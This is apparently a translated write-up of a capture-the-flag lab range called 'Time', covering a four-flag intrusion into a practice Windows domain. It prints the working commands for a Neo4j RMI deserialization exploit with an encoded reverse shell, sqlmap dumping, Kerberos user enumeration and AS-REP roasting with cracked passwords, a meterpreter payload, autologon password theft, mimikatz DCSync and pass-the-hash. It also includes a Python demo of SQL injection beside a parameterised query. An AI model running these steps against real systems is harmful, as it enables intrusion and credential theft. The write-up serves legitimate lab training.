
Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Time-writeup


Range description

Time is a medium-difficulty range environment. Completing it teaches the techniques used in intranet penetration: proxy forwarding, intranet scanning, information gathering, privilege escalation and lateral movement. It also deepens understanding of the core authentication mechanism of a domain environment (Kerberos) and covers several interesting points of domain penetration. There are 4 flags, spread across different hosts.

Technology

Neo4j, Kerberos, Privilege Escalation, Domain Penetration

First flag

External host information gathering (fscan)

start infoscan

(icmp) Target '39.98.236.25' is alive

icmp alive hosts len is: 1

39.98.236.25:22 open

39.98.236.25:1337 open

39.98.236.25:7474 open

39.98.236.25:7473 open

39.98.236.25:7687 open

39.98.236.25:35555 open

alive ports len is: 6

start vulscan

Completed 0/6 [-] webtitle http://39.98.236.25:7473 Get 'http://39.98.236.25:7473': net/http: HTTP/1.x transport connection broken: malformed HTTP response '\x15\x03\x03\x00\x02\x02P'

[*] WebTitle:http://39.98.236.25:7474 code:200 len:145 title:None

[*] WebTitle:http://39.98.236.25:7687 code:400 len:0 title:None

[*] WebTitle:https://39.98.236.25:7687 code:400 len:0 title:None

Completed 6/6

scan end

Neo4j unauthorized RCE (CVE-2021-34371)

Neo4j is an open-source graph database. The open ports match its defaults: 7474 is the HTTP connector, 7473 the HTTPS connector (the plaintext request fscan sent to it was answered with a TLS alert record, \x15\x03\x03..., which is the "malformed HTTP response" in the scan output above), 7687 is Bolt, and 1337 is the legacy Neo4j Shell RMI endpoint.

In Neo4j 3.4.18 and earlier, if the Neo4j Shell interface is enabled, an unauthenticated attacker can call its remote methods over RMI. The setSessionVariable method takes an arbitrary object as the variable value, and deserializing that value drives a gadget chain to code execution. Because the object is deserialized as an argument to the exported remote object rather than by the RMI registry or DGC, the JEP 290 built-in filters of newer JDKs do not apply, so the exploit works regardless of the Java version. In Neo4j 3.5 and later, Neo4j Shell was replaced by Cypher Shell, which talks Bolt instead of RMI.

https://github.com/zwjjustdoit/CVE-2021-34371.jar

java -jar rhino_gadget.jar rmi://39.98.236.25:1337 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3R.NC81NTU1IDA+JjE=}|{base64,-d}|{bash,-i}'

The base64 is a bash reverse shell, bash -i >& /dev/tcp/<attacker>/5555 0>&1 (the attacker address inside the encoded string is garbled in the source); the {echo,...} brace-expansion form avoids spaces in the command string passed through the gadget. Running it gives a reverse shell.

Locate the flag file on the host and read it to get the first flag.

Second flag

Intranet penetration

Upload a proxy agent and fscan to the Neo4j host and scan the internal 172.22.6.0/24 segment (the shell is not root, so fscan cannot open a raw ICMP socket and falls back to ping):

start infoscan

Completed 0/0 listen ip4:icmp 0.0.0.0: socket: operation not allowed

trying RunIcmp2

The current user permissions unable to send icmp packets

start ping

(icmp) Target 172.22.6.12 is alive

(icmp) Target 172.22.6.25 is alive

(icmp) Target 172.22.6.38 is alive

(icmp) Target 172.22.6.36 is alive

[*] Icmp alive hosts len is: 4

172.22.6.25:445 open

172.22.6.12:445 open

172.22.6.25:139 open

172.22.6.12:139 open

172.22.6.25:135 open

172.22.6.12:135 open

172.22.6.38:80 open

172.22.6.36:22 open

172.22.6.38:22 open

172.22.6.36:7687 open

172.22.6.12:88 open

[*] alive ports len is: 11

start vulscan

[+] NetInfo:

[*]172.22.6.25

[-]WIN2019

[-]172.22.6.25

[+] NetInfo:

[*]172.22.6.12

[-]DC-PROGAME

[-]172.22.6.12

[*] 172.22.6.12 [+]DC XIAORANG\DC-PROGAME Windows Server 2016 Datacenter 14393

[*] 172.22.6.25 XIAORANG\WIN2019

[*] 172.22.6.12 (Windows Server 2016 Datacenter 14393)

[*] WebTitle:http://172.22.6.38 code:200 len:1531 title: backend login

[*] WebTitle:https://172.22.6.36:7687 code:400 len:50 title:None

Completed 11/11

SQL injection

Visit http://172.22.6.38 through the proxy. It is a backend login page; capture the login request:

POST /index.php HTTP/1.1

Host: 172.22.6.38

Content-Length: 30

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://172.22.6.38

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://172.22.6.38/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8

Connection: close

username=admin&password=1111111

Test the request for injection with sqlmap (process omitted).

sqlmap -r 1.txt --dump -T oa_f1Agggg -D oa_db --batch

Dumping that table gives the second flag.

The oa_db database also has oa_admin and oa_users tables; the 500 user names in oa_users are collected into the dictionary username.txt.
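To show what sqlmap is abusing in that login form, here is an added example written for this page (the writeup does not show the PHP source): a login check that splices the POST fields into the SQL string, beside a parameterised one, run against a constructed in-memory SQLite table. The table names oa_users and oa_admin come from the page; their columns and rows are invented for the demo, and the payloads are the generic authentication bypass and UNION read that sqlmap automates.

```python
"""Injectable login check vs parameterised query. Added example, not the target's code."""
import sqlite3


def make_db():
    """Constructed sample data: columns and rows are assumptions for the demo."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE oa_users (username TEXT, password TEXT);
        INSERT INTO oa_users VALUES ('admin', 'S3cret!'), ('zhangsan', 'P@ss1');
        CREATE TABLE oa_admin (username TEXT, password TEXT);
        INSERT INTO oa_admin VALUES ('sysadmin', 'AdminPassw0rd');
    """)
    return db


def vulnerable_login(db, username, password):
    """What an injectable index.php does: user input becomes part of the SQL text."""
    sql = (f"SELECT username FROM oa_users "
           f"WHERE username='{username}' AND password='{password}'")
    return [row[0] for row in db.execute(sql)]


def safe_login(db, username, password):
    """Parameterised query: input is bound as a value and can never change the query."""
    sql = "SELECT username FROM oa_users WHERE username=? AND password=?"
    return [row[0] for row in db.execute(sql, (username, password))]


# Payloads in the username field; '-- ' comments out the rest of the statement.
BYPASS = "admin'-- "                                   # logs in as admin, password ignored
UNION = "x' UNION SELECT username || ':' || password FROM oa_admin-- "   # reads another table


def demo():
    db = make_db()
    return {
        "vulnerable_bypass": vulnerable_login(db, BYPASS, "wrong"),
        "vulnerable_union": vulnerable_login(db, UNION, "wrong"),
        "safe_bypass": safe_login(db, BYPASS, "wrong"),
        "safe_union": safe_login(db, UNION, "wrong"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The UNION payload is the manual form of what `sqlmap --dump -T ... -D oa_db` does table by table; the parameterised version returns nothing for either payload because the quote and the comment are just characters in a bound string.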


Third flag

Domain user enumeration

In Kerberos AS-REQ authentication, if the principal named in cname does not exist, the KDC answers with KDC_ERR_C_PRINCIPAL_UNKNOWN; if it does exist, the answer is KDC_ERR_PREAUTH_REQUIRED (or an AS-REP when pre-authentication is not required). So, without any domain credentials, valid domain users can be enumerated from outside the domain by sending AS-REQs and reading the reply, which is what kerbrute does.

https://github.com/ropnop/kerbrute

proxychains ./kerbrute_linux_amd64 userenum --dc 172.22.6.12 -d xiaorang.lab username.txt -t 10

Running it from kali through the proxy did not succeed and produced no results; I copied the binary to the entry host and only got results by running it there.

There are 74 valid users in total; they are saved as the dictionary user.txt.

AS-REP Roasting

If a domain user has the option "Do not require Kerberos preauthentication" set, anyone can send an AS-REQ for that user to port 88 of the domain controller and receive an AS-REP whose enc-part is encrypted with a key derived from the user's password. With RC4 (etype 23) that enc-part can be rewritten into the "$krb5asrep$23$user@REALM:..." format that hashcat mode 18200 (Kerberos 5, etype 23, AS-REP) and john understand, and cracked offline to recover the plaintext password.

Look for accounts that do not require pre-authentication with impacket's GetNPUsers.py:

proxychains python3 GetNPUsers.py -dc-ip 172.22.6.12 -usersfile user.txt xiaorang.lab/

Two accounts come back, [email protected] and [email protected] (the user names are garbled in the source); the tool prints them in hashcat format:

[email protected]@XIAORANG.LAB:b6c410706b5e96c693b2fc61ee1064c3$2dc9fbee784e7997333f30c6bc4298ab5752ba94be7022e807af418c11359fd92597e253752f4e61d2d18a83f19b5c9df4761e485853a3d879bcf7a270d6f846683b811a80dda3809528190d7f058a24996aff13094ff9b32c0e2698f6d639b4d237a06d13c309ce7ab428656b79e582609240b01fb5cd47c91573f80f846dc483a113a86977486cecce78c03860050a81ee19921d3500f36ff39fa77edd9d5614cf4b9087d3e42caef68313d1bb0c4f6bc5392943557b584521b305f61e418eb0f6eb3bf339404892da55134cb4bf828ac318fe00d68d1778b7c82caf03b65f1938e54ed3fa51b63cdb2994

[email protected]@XIAORANG.LAB:971802b84ce99050ad3c5f49d11fd0b7$6c1be075c3cf2a7695529de2ebbf39c5ec7e5326c9d891dac2107b239892f76befe52c860e4e1e2ff6537a5765a6bcb6b8baca792d60765ac0bbe1b3c5e59f3ec51b7426636a437d5df12130eb68d9b17ef431455415671c7331a17ce823e28cc411677bed341d3fceefc3451b8b232ea6039661625a5c793e30c4d149b2ed9d2926e9d825b3828744ebce69e47746994c9a749ceeb76c560a1840bc74d2b9f301bb5b870c680591516354460dab2238e7827900ed80320dd3a6f46874b1bc8a3a68aea7bd11d0683ec94103f59d9511691090928e98d0d8978f511e71fd9db0067fa0d450c120f3726918d7

Crack them with hashcat (mode 18200, wordlist rockyou.txt):

hashcat -m 18200 --force -a 0 '[email protected]@XIAORANG.LAB:b6c410706b5e96c693b2fc61ee1064c3$2dc9fbee784e7997333f30c6bc4298ab5752ba94be7022e807af418c11359fd92597e253752f4e61d2d18a83f19b5c9df4761e485853a3d879bcf7a270d6f846683b811a80dda3809528190d7f058a24996aff13094ff9b32c0e2698f6d639b4d237a06d13c309ce7ab428656b79e582609240b01fb5cd47c91573f80f846dc483a113a86977486cecce78c03860050a81ee19921d3500f36ff39fa77edd9d5614cf4b9087d3e42caef68313d1bb0c4f6bc5392943557b584521b305f61e418eb0f6eb3bf339404892da55134cb4bf828ac318fe00d68d1778b7c82caf03b65f1938e54ed3fa51b63cdb2994' rockyou.txt

hashcat -m 18200 --force -a 0 '[email protected]@XIAORANG.LAB:971802b84ce99050ad3c5f49d11fd0b7$6c1be075c3cf2a7695529de2ebbf39c5ec7e5326c9d891dac2107b239892f76befe52c860e4e1e2ff6537a5765a6bcb6b8baca792d60765ac0bbe1b3c5e59f3ec51b7426636a437d5df12130eb68d9b17ef431455415671c7331a17ce823e28cc411677bed341d3fceefc3451b8b232ea6039661625a5c793e30c4d149b2ed9d2926e9d825b3828744ebce69e47746994c9a749ceeb76c560a1840bc74d2b9f301bb5b870c680591516354460dab2238e7827900ed80320dd3a6f46874b1bc8a3a68aea7bd11d0683ec94103f59d9511691090928e98d0d8978f511e71fd9db0067fa0d450c120f3726918d7' rockyou.txt

That gives two accounts and passwords:

[email protected]/strawberry

[email protected]/hellokitty

Domain environment analysis

Log in to WIN2019 (172.22.6.25) with one of the domain accounts, upload SharpHound and collect the domain data:

SharpHound.exe -c all

The exported archive contains several JSON files holding the various relationships in the domain.

Import the data into BloodHound, open Analysis and run Find Shortest Paths to Domain Admins. Each edge is read from its thick (source) end to its thin (arrowhead) end as "source has this permission or relationship on target", which gives the following path.

From BloodHound, the next step is the user yuxuan.

Windows automatic logon

HasSession: the user has a logon session on that computer, so the user's credentials are held in LSASS memory there; the edge shows yuxuan is logged on to WIN2019.

Many users configure their computer to log on automatically. With AutoAdminLogon the account and password are stored in plaintext in the registry under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (DefaultUserName, DefaultDomainName, DefaultPassword), or as the LSA secret DefaultPassword when configured with Sysinternals Autologon; Metasploit's windows_autologin post module reads the registry values.

Get a bind shell

msfvenom -p windows/meterpreter/bind_tcp -f exe -o shy.exe

(The default LPORT is 4444, matching the handler below.) Upload shy.exe to WIN2019 (172.22.6.25) and run it, then start msf through the proxy and connect:

use exploit/multi/handler

set payload windows/meterpreter/bind_tcp

set rhost 172.22.6.25

run

Grab the automatic logon password:

meterpreter > run windows/gather/credentials/windows_autologin

I did not get the password here and could not continue.

No way around it; I had to keep following other people's writeups to continue.

Grabbing the password gives yuxuan/Yuxuan7QbrgZ3L, so now we can log on to WIN2019 as yuxuan.

Pass the hash

HasSIDHistory: the account's sIDHistory attribute carries SIDs from a previous identity (normally filled in during a domain migration). Those SIDs are added to the user's token and Kerberos PAC, so the user keeps the access those SIDs had even though it no longer belongs to the old domain; within one domain, a SID placed in sIDHistory grants the same access as being that principal. That edge on yuxuan is what supplies the rights for the DCSync below.

Use yuxuan to dump the Administrator hash with DCSync:

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

Then authenticate to WIN2019 over SMB as Administrator with that NT hash and read the third flag:

proxychains crackmapexec smb 172.22.6.25 -u administrator -H 04d93ffd6f5f6e4490e0de23f240a5e9 -d xiaorang.lab -x 'type Users\Administrator\flag\flag03.txt'

Original link: https://zhuanlan.zhihu.com/p/582525371
